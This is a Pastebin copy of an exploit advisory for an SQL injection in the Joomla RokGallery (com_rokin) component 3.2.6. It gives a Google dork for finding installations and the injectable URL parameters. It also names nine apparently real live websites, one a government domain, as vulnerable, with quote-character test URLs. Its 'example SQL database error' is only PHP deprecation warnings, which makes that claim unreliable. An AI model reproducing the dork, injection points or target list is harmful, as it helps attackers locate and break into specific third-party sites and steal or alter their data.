KingSkrupellos

Joomla Rokin RokGallery Components 3.2.6 SQL Injection

Jan 31st, 2019
105
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.03 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla Rokin RokGallery Components 3.2.6 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 31/01/2019
  7. # Vendor Homepage : rockettheme.com
  8. # Software Download Link : rockettheme.com/joomla/extensions/rokgallery
  9. # Software Information Link : extensions.joomla.org/extension/rokgallery/
  10. # Software Version : 3.2.6
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:''/index.php?option=com_rokin''
  15. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  16. Special Elements used in an SQL Command ('SQL Injection') ]
  17. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  18. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  19. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  20. # Reference Link : cxsecurity.com/issue/WLB-2019010299
  21. packetstormsecurity.com/files/151434/Joomla-Rokin-RokGallery-3.2.6-SQL-Injection.html
  22.  
  23. ####################################################################
  24.  
  25. # Description about Software :
  26. ***************************
  27. RokGallery is a ground-up revolutionary gallery extension, developed to be
  28.  
  29. hugely flexible, versatile and user friendly.
  30.  
  31. The system itself is built on a custom tag-based architecture
  32.  
  33. with the ability to have multiple tag-based galleries.
  34.  
  35. ####################################################################
  36.  
  37. # Impact :
  38. ***********
  39.  
  40. Joomla Rokin RokGallery 3.2.6 component for Joomla! is prone to an SQL-injection vulnerability
  41.  
  42. because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  43.  
  44. Exploiting this issue could allow an attacker to compromise the application,
  45.  
  46. access or modify data, or exploit latent vulnerabilities in the underlying database.
  47.  
  48. ####################################################################
  49.  
  50. # SQL Injection Exploit :
  51. **********************
  52.  
  53. /index.php?option=com_rokin&Itemid=[SQL Injection]
  54.  
  55. /index.php?option=com_rokin&unit=gallery&act=show&Itemid=[SQL Injection]
  56.  
  57. /index.php?option=com_rokin&Itemid=[ID-NUMBER]
  58. &unit=photo&act=show&albumid=[SQL Injection]
  59.  
  60. /index.php?option=com_rokin&Itemid=[ID-NUMBER]
  61. &unit=photo&act=show&albumid=[ID-NUMBER]&photoid=[SQL Injection]
  62.  
  63. /index.php?option=com_rokin&Itemid=[ID-NUMBER]
  64. &unit=album&act=show&albumid=[SQL Injection]
  65.  
  66. ####################################################################
  67.  
  68. # Example Vulnerable Sites :
  69. *************************
  70.  
  71. [+] tcpghana.gov.gh/index.php?option=com_rokin&Itemid=165
  72.  
  73. [+] adezn.org/index.php?option=com_rokin&unit=gallery&act=show&Itemid=77
  74.  
  75. [+] rugbywinterthur.ch/rcwinti/index.php?option=com_rokin&Itemid=
  76. 2&unit=photo&act=show&albumid=23%27
  77.  
  78. [+] canada-club-geneva.com/cms/index.php?option=com_rokin&Itemid=
  79. 63&unit=photo&act=show&albumid=9&photoid=1%27
  80.  
  81. [+] transportesarv.com.ec/web/index.php?option=com_rokin
  82. &Itemid=88&unit=album&act=show&albumid=1%27
  83.  
  84. [+] muskaria.com/index.php?option=com_rokin&Itemid=
  85. &unit=photo&act=show&albumid=198&photoid=%27
  86.  
  87. [+] neun-bowlers.mwis.de/index.php?option=com_rokin&Itemid=54%27
  88.  
  89. [+] clnm.org/en/index.php?option=com_rokin&Itemid=
  90. 56&unit=photo&act=show&albumid=8&photoid=%27
  91.  
  92. [+] ilpulcino.org/index.php?option=com_rokin&Itemid=
  93. 121&unit=album&act=show&albumid=%27
  94.  
  95. ####################################################################
  96.  
  97. # Example SQL Database Error :
  98. ****************************
  99.  
  100. Deprecated: preg_replace(): The /e modifier is deprecated, use
  101. preg_replace_callback instead in /home/transp15/public_html
  102. /web/libraries/joomla/filter/filterinput.php on line 512
  103.  
  104. Strict Standards: Non-static method JLoader::import() should not
  105. be called statically in /home/transp15/public_html
  106. /web/libraries/loader.php on line 186
  107.  
  108. ####################################################################
  109.  
  110. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  111.  
  112. ####################################################################
Add Comment
Please, Sign In to add comment